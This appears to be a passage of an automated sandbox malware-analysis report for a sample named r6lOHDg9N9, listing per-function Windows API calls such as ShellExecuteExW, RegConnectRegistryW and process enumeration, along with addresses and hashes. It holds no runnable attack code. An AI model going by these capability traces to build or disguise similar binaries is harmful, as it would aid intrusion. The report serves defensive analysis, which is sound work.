                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                              • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                              • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                              • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                              • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                              • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                              • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ConnectRegistry_wcslen
                                                                              • String ID: HH
                                                                              • API String ID: 535477410-2761332787
                                                                              • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                              • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                              • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                              • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00457C34
                                                                              • _memset.LIBCMT ref: 00457CE8
                                                                              • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                              • String ID: <$@
                                                                              • API String ID: 1325244542-1426351568
                                                                              • Opcode ID: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                              • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                              • Opcode Fuzzy Hash: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                              • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                              • __wsplitpath.LIBCMT ref: 004737E1
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • _wcscat.LIBCMT ref: 004737F6
                                                                              • __wcsicoll.LIBCMT ref: 00473818
                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                              • String ID:
                                                                              • API String ID: 2547909840-0
                                                                              • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                              • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                              • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                              • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                              • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                              • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                              • String ID:
                                                                              • API String ID: 2354583917-0
                                                                              • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                              • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                              • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                              • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                              APIs
                                                                                • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                              • GetMenu.USER32 ref: 004776AA
                                                                              • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                              • _wcslen.LIBCMT ref: 0047771A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$CountItemStringWindow_wcslen
                                                                              • String ID:
                                                                              • API String ID: 1823500076-0
                                                                              • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                              • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                              • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                              • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                              APIs
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                              • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                              • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                              • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Enable$Show$MessageMoveSend
                                                                              • String ID:
                                                                              • API String ID: 896007046-0
                                                                              • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                              • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                              • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                              • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                              • SendMessageW.USER32(02FF1A78,000000F1,00000000,00000000), ref: 004414C6
                                                                              • SendMessageW.USER32(02FF1A78,000000F1,00000001,00000000), ref: 004414F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 312131281-0
                                                                              • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                              • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                              • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                              • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 004484C4
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                              • IsMenu.USER32(?), ref: 0044857B
                                                                              • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                              • DrawMenuBar.USER32 ref: 004485E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                                              • String ID: 0
                                                                              • API String ID: 3866635326-4108050209
                                                                              • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                              • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                              • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                              • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                              APIs
                                                                              • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                              • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                              • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                              • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                              • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Interlocked$DecrementIncrement$Sleep
                                                                              • String ID: 0vH
                                                                              • API String ID: 327565842-3662162768
                                                                              • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                              • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                              • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                              • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                              • GetFocus.USER32 ref: 00448B1C
                                                                              • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                              • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                              • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Enable$Show$FocusMessageSend
                                                                              • String ID:
                                                                              • API String ID: 3429747543-0
                                                                              • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                              • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                              • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                              • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                              APIs
                                                                              • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • _memset.LIBCMT ref: 00401C62
                                                                              • _wcsncpy.LIBCMT ref: 00401CA1
                                                                              • _wcscpy.LIBCMT ref: 00401CBD
                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                              • String ID: Line:
                                                                              • API String ID: 1620655955-1585850449
                                                                              • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                              • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                              • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                              • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                              • __swprintf.LIBCMT ref: 0045D3CC
                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                              • String ID: %lu$HH
                                                                              • API String ID: 3164766367-3924996404
                                                                              • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                              • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                              • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                              • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                              • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                              • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Msctls_Progress32
                                                                              • API String ID: 3850602802-3636473452
                                                                              • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                              • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                                              • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                              • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                                                              APIs
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00455451
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0045545F
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                              • String ID:
                                                                              • API String ID: 3985565216-0
                                                                              • Opcode ID: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                              • Instruction ID: 02eb1b45cc7e926b76574f27881fb1e8d9d372094f4d7b34cf8607babd6cb63d
                                                                              • Opcode Fuzzy Hash: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                              • Instruction Fuzzy Hash: EA213270200A019FCB20DF65CAD4B2A77A9BF45312F50855EED45CB352DB39EC45CB69
                                                                              APIs
                                                                              • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                                              • __calloc_crt.LIBCMT ref: 00415743
                                                                              • __getptd.LIBCMT ref: 00415750
                                                                              • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                                              • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                                              • __dosmaperr.LIBCMT ref: 004157A9
                                                                                • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
